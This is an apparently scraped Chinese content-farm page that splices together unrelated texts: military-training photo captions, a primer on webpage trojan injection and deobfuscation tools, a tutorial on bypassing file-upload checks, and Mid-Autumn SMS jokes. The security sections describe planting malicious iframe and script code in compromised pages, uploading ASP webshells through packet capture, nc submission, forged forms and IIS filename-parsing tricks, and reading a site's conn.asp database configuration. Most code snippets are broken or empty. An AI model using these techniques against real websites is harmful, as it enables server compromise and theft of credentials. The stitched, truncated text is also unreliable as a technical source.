一话写入党申请书..美女们又话..唉..我仲想生2个baby呢...哈哈.. 搞笑... 军训日记の09国贸篇照片描述:第一次班会..哈哈..我见到自己... 照片 照片描述:自我介绍吖.... 照片描述:学敬礼吖! 描述:动员大会 照片描述:休息吖...哈... 照片描述:送教官晚会 照片描述:歌咏比赛..我地国贸班挪了第二吖... 照片描述:唉..呢d系未改革前嘎特色方队...我都系里面学侧倒吖... 照片描述:一早就俾罚,,,唉 照片描述:侧倒,,, 照片描述:山贼教官最钟意我地甘样学正步..好似去耕田甘... 照片描述:呢d罚得经典喇... 照片描述:送教官晚会 照片描述:第二次晚会... 希望我地09国贸系未来嘎3年里边都可以开开心心甘生活喇...~

篇8:网马解密初级篇漏洞预警

网马解密初级篇

一. 网页挂马的概念:

网页挂马是指:在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行 等危险操作,

二.常见的网页挂马方式:

框架挂马:

2. js文件挂马:

首先将以下代码:

document.write(“”);

保存为xxx.js,

则JS挂马代码为:

3. js变形加密

muma.txt可改成任意后缀

4. flash木马

网页木马地址 插入木马地址 width=10 height=10“, ”GET“ 宽度和高度,方式后面的照添,更改木马地址就可以了。

5. 不点出现链接的木马

页面要显示的内容

6.隐蔽挂马:

top.document.body.innerHTML=top.document.body.innerHTML+'rn'[/url]

7.css中挂马:

body {background-image:url('javascript.:document.write(”“)')}

8.Java挂马:

三.常见网马所利用的漏洞判断方式:

1. 根据恶意网址名称来判断漏洞

2.根据CLSID判断漏洞:

常见网马解密工具:

1.Freshow工具(作者:jimmyleo大牛)

工具简介(摘自freshow帮助文档):Freshow是一款脚本解密的工具,其开发的初衷是减少机械操作和简化处理步骤,使您能专注于脚本本身,

一般解密方法有手动和工具两种,Freshow尽量使得工作在一个工具下完成,当然它还不是那么成熟,您可以搭配其他工具来完成工作。Freshow目前具备过滤和解密功能模块能满足常见加密分析所需的操作。它的性能和稳定性还有最终的成果取决于您对Freshow的熟悉程度、对脚本知识的了解程度以及分析程度。

2.HTMLDecoder(作者:祥子大牛)

工具简介:这是一款自动解密的工具,功能非常强大,可惜俺对它研究还是,不是很深。只用过它解密过flash网马和pdf网马。

3.malzilla又称神器

工具简介:这个工具很好很强大,freshow无法解出的网马,使用这个工具基本都可以解出。

4.MDecoder(麦田大牛)

工具简介(摘自麦田的博客):1,Freshow的模仿者,使用WIN32汇编编写。

2,支持对网马中swf和exe的查找(不完善)。

3,支持网马识别,可通过修改classid.ini来扩充特征。

暂时先介绍这么多,还有很多辅助类的工具,后续会一一介绍给大家

篇9:脚本入侵上传漏洞总结篇(臭小子)

脚本入侵-上传漏洞总结篇(臭小子),从事于网站开发的程序员要看下,不要让自己的程序别 利用,

1:抓包上传

我们可以用WSockExpert(抓包工具) hkcpost抓包提交软件或等等抓包工具

说下hkcpost有时候电脑打不开WSockExpert(抓包工具) 我们就用这工具

很好用

说到抓包上传 比如一个上传地址site/upload.asp

或后台管理后台上传地址

我们就抓包cookies 参数 和文件上传成功地址

然后用明小子或等等抓包工具 上传。大家可以去百度搜索相关的教程和文章看看

2:抓包和nc上传

抓包cookies 参数 和文件的数据 然后保存成文本 比如hack92.txt

然后用编译C32asm 或等等编译工具 修改

然后用nc.exe 提交 命令nc -vv site 80

大家可以去百度搜索下nc上传 或突破 等等教程文章看

3:本地上传漏洞

把下面的代码 保存为hack92.html

------------------------------

encType=multipart/form-data>

------------------------------------------

添加上传地址

把:把上传地址复制这里到这里 你的上传地址

然后打开hack92.html 出现两个页面 第一个上你的图片木马 然后在上你的ASP木马

提示在上asp木马记得 加个空格

4:iis漏洞

把我们的asp木马 改成xxx.asp;xxx.jpg 或xxx.asp.jpg

或建立asp.asp asa.asa 目录 上图片asp木马

5:上传突破

当网站不允许上传asp .. cer ..cdx . htr 等文件时,上传一个stm文件,代码为 “”(想查看什么文件就写什么文件名,这里我假设想查看的文件名为”conn.asp”),,然后直接打开这个stm文件的地址,再查看源代码,“conn.asp”这个文件的代码就一览无遗了!

大家可以去百度搜索相关的文章和教程

篇10:中秋节短信发出后的八种结局终结篇

中秋节短信发出后的八种结局(终结篇) -中秋节

1.中秋节独自踯躅在异乡的.街头,想着远在他方的女友。拿起手机写一个长达二百余字情深款款的短消息,写到二百一十四个字时来了个电话,把短消息冲掉了……

结局:在街头痛哭。

2.给网友MM发一短消息祝节日快乐,片刻收到回信,兴致勃勃拿起一看――“你谁呀?”

结局:黯然神伤。

3.作绝句一首发给老友祝节日快乐,片刻收到回信――把短消息几乎原封不动发回来了,结尾加了一句“也祝你快乐”。

结局:仰天长啸。

4.给旧日情人发短消息祝节日快乐,发一遍不成功,再发还不成功,再发再发再发……都不成功。仔细一看对方号码是座机。

结局:悲从中来。

5.兴致勃勃给老友发短消息祝节日快乐,片刻收到回信――“你欠我的五百块钱什么时候还?”

结局:以头抢地。

6.痴痴地等女友短信传情,听到手机滴答一响,赶紧抓起一看――“××公司祝您节日快乐”。

结局:泪如雨下。

7.给老友发短消息祝节日快乐,片刻收到回信――“哥几个在三里屯喝酒没带够钱让人扣下了,带上钱快来!”

结局:痛不欲生。

8.给老总发短消息祝节日快乐,片刻收到回信,心想老总真客气,打开一看――“今晚公司没人值班太不安全,要不你就辛苦一下吧!”

结局:在街头暴走。

9 隐藏篇:下载nettone打网络电话(9.1号起免费),拿着号码直播110:“警察大哥!发短信太痛苦了!!!我要打长途电话--免费!!!中秋节快乐!!!”

结局:家里电话被打暴

大家中秋节快乐!!

网络安全活动总结报告

公司信息中心实习总结

水利行业事业单位资产管理优化探究论文

对联生成器

网络安全的论文

项目化教学

计算机应用基础教学中过程性评价的研究论文

工作个人总结

课件制作的培训总结

会计实习论文

上传漏洞终结篇讲解
《上传漏洞终结篇讲解.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【上传漏洞终结篇讲解(精选10篇)】相关文章:

基础力学实验教学问题与实践论文2022-12-01

工程制图及CAD教学资源库研究论文2023-03-24

安全工作措施范文2022-06-28

小学工作坊个人研修计划2022-10-30

教你熟知Cookies文件的欺骗2023-04-10

网络安全教案2022-10-19

Cookies欺骗的艺术2023-09-24

工商局行政处罚决定书范文2022-08-19

消防安全演讲稿2023-07-18

高中英语翻转课堂教学模式分析论文2022-05-07